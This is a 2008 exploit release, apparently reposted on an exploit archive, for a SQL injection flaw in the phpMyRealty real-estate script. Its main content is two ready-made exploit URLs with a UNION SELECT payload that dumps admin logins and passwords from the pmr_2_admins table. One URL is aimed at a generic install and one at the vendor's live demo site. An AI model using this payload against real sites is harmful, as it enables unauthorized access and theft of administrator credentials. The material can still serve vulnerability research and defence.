phpMyRealty (location) Remote SQL Injection Vulnerability
2008-08-01 00:00:00┌┌────────────────────────────────────────────────────────────────────────────â”
││ C r a C k E r ┌┘
┌┘ T H E C R A C K O F E T E R N A L M I G H T ││
└────────────────────────────────────────────────────────────────────────────┘┘
┌──── From The Ashes and Dust Rises An Unimaginable crack.... ────â”
┌┌────────────────────────────────────────────────────────────────────────────â”
┌┘ [ Remote SQL Injection ] ┌┘
└────────────────────────────────────────────────────────────────────────────┘┘
: Author : CraCkEr : : :
│ Group : N/A │ │ │
│ Script : phpmyrealty │ │ Register Globals : │
│ Download : phpmyrealty.com │ │ │
│ Critical : High [░░▒▒▓▓██] │ │ [█] ON [ ] OFF │
│ │ │ │
│ ─────────────────────────────────────┘ └─────────────────────────────────── │
│ DALnet #crackers ┌┘
└────────────────────────────────────────────────────────────────────────────┘┘
: :
│ Release Notes: │
│ â•â•â•â•â•â•â•â•â•â•â•â•╠│
│ Typically used for remotely exploitable vulnerabilities that can lead to │
│ system compromise. │
│ │
┌┌────────────────────────────────────────────────────────────────────────────â”
┌┘ Exploit URL's ┌┘
└────────────────────────────────────────────────────────────────────────────┘┘
[SQL]
www.localhost/path/index.php?location=-1 UNION SELECT 1,concat(login,0x3a,password),3,4,5,6,7 FROM pmr.pmr_2_admins--
Live Demo:
http://www.phpmyrealty.com/demo/index.php?location=-1 UNION SELECT 1,concat(login,0x3a,password),3,4,5,6,7 FROM pmr.pmr_2_admins--
└─────────────────────────────────────────────────────────────────────────────┘
Greets:
The_PitBull, Raz0r, iNs, Sad, His0k4, Hussin X, Mr. SQL .
┌┌────────────────────────────────────────────────────────────────────────────â”
┌┘ © CraCkEr 2008 ┌┘
└────────────────────────────────────────────────────────────────────────────┘┘
#
Fixes
No fixesPer poter inviare un fix è necessario essere utenti registrati.

